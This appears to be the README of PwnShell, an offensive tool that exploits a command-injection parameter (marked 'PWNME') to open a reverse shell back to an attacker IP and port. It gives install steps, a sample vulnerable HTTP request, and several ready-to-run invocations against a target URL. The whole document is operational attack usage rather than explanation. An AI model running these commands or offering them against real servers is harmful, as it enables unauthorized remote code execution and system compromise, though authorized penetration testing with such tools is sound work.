git clone https://github.com/zAbuQasem/PwnShell
cd PwnShell/
pip3 install -r requirements.txt
chmod +x pwnshell.py
./pwnshell.py -i [Attacker-IP] -f [REQUEST FILE] -s (To use https prefix)
Copy from Burp or Network tab
Replace the Vulnerable place in the parameter with 'PWNME'
GET /Vulnerable.php?cmd=PWNME HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
./pwnshell.py -i [Attacker-IP] -p [Attacker-Port] -u [TARGET-URL] -m [REQUEST-METHOD] -c [COOKIES (optional)] -H [HEADERS (optional)]
```sh
./pwnshell.py -i [Attacker-IP] -u http/s://<TARGET>/vulnerable.php?cmd=PWNME --method GET --cookies '{"key" : "value"}'
-Replace the Vulnerable place in the parameter with 'PWNME'
./pwnshell.py -H 127.0.0.1 -u http://10.10.10.10/vulnerable.php?cmd=PWNME
Zeyad AbuQasem - LinkedIn
Omar Albalouli - LinkedIn & Github